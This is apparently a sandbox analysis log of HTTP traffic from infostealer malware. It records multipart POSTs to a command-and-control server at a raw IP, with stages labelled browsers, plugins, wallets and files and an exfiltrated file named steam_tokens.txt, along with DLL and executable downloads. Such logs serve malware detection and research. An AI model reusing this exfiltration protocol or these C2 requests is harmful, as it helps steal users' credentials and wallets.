Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGDGDHDGDBFIDHDBAHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 44 47 44 48 44 47 44 42 46 49 44 48 44 42 41 2d 2d 0d 0a Data Ascii: ------AKJDGDGDHDGDBFIDHDBAContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------AKJDGDGDHDGDBFIDHDBAContent-Disposition: form-data; name="message"browsers------AKJDGDGDHDGDBFIDHDBA--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKKEGCAAECAAAKFBGIEHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 4b 45 47 43 41 41 45 43 41 41 41 4b 46 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4b 45 47 43 41 41 45 43 41 41 41 4b 46 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4b 45 47 43 41 41 45 43 41 41 41 4b 46 42 47 49 45 2d 2d 0d 0a Data Ascii: ------BAKKEGCAAECAAAKFBGIEContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------BAKKEGCAAECAAAKFBGIEContent-Disposition: form-data; name="message"plugins------BAKKEGCAAECAAAKFBGIE--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDHCAFCGDAAKEBFIJDGHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 48 43 41 46 43 47 44 41 41 4b 45 42 46 49 4a 44 47 2d 2d 0d 0a Data Ascii: ------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------KJDHCAFCGDAAKEBFIJDGContent-Disposition: form-data; name="message"fplugins------KJDHCAFCGDAAKEBFIJDG--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKJKFBKKECFHJKEBKEHHost: 46.8.231.109Content-Length: 6599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKKEGCAAECAAAKFBGIEHost: 46.8.231.109Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHIHost: 46.8.231.109Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFBHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 2d 2d 0d 0a Data Ascii: ------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GDHIDHIEGIIIECAKEBFBContent-Disposition: form-data; name="file"------GDHIDHIEGIIIECAKEBFB--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFCHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 2d 2d 0d 0a Data Ascii: ------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="file"------GCGHCBKFCFBFHIDHDBFC--
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKFBAFIDAEBFHJKJEBFHost: 46.8.231.109Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJKFCBKKJDGDHIDBGIHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4b 46 43 42 4b 4b 4a 44 47 44 48 49 44 42 47 49 2d 2d 0d 0a Data Ascii: ------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------KJKJKFCBKKJDGDHIDBGIContent-Disposition: form-data; name="message"wallets------KJKJKFCBKKJDGDHIDBGI--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHDBAECGCAFHJJDAKFHost: 46.8.231.109Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 44 42 41 45 43 47 43 41 46 48 4a 4a 44 41 4b 46 2d 2d 0d 0a Data Ascii: ------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------GHDHDBAECGCAFHJJDAKFContent-Disposition: form-data; name="message"files------GHDHDBAECGCAFHJJDAKF--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJDHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 2d 2d 0d 0a Data Ascii: ------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="file"------GIJJKKJJDAAAAAKFHJJD--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFIEBKKJJDAKFHIDBFHHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 2d 2d 0d 0a Data Ascii: ------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="message"ybncbhylepme------CAFIEBKKJJDAKFHIDBFH--
Source: global traffic	HTTP traffic detected: GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFCHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 2d 2d 0d 0a Data Ascii: ------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GCGHCBKFCFBFHIDHDBFC--
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKJKJDGCGDBGDHIJKJEHost: 46.8.231.109Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 39 44 34 38 46 41 44 42 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------AAKJKJDGCGDBGDHIJKJEContent-Disposition: form-data; name="hwid"1A9D48FADB6D3392259749------AAKJKJDGCGDBGDHIJKJEContent-Disposition: form-data; name="build"default------AAKJKJDGCGDBGDHIJKJE--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIIDAFIDGCFHJJDGDAHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 2d 2d 0d 0a Data Ascii: ------GDHIIDAFIDGCFHJJDGDAContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------GDHIIDAFIDGCFHJJDGDAContent-Disposition: form-data; name="message"browsers------GDHIIDAFIDGCFHJJDGDA--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKKFHCFIECAAAKEGCFHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 2d 2d 0d 0a Data Ascii: ------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------CAAKKFHCFIECAAAKEGCFContent-Disposition: form-data; name="message"plugins------CAAKKFHCFIECAAAKEGCF--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIECFHDBAAECAAKFHDHIHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 43 46 48 44 42 41 41 45 43 41 41 4b 46 48 44 48 49 2d 2d 0d 0a Data Ascii: ------IIECFHDBAAECAAKFHDHIContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------IIECFHDBAAECAAKFHDHIContent-Disposition: form-data; name="message"fplugins------IIECFHDBAAECAAKFHDHI--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCFCBAKKFBFIECAEBAHost: 46.8.231.109Content-Length: 6383Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHIJKJKFIDHJKFBGHCHost: 46.8.231.109Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
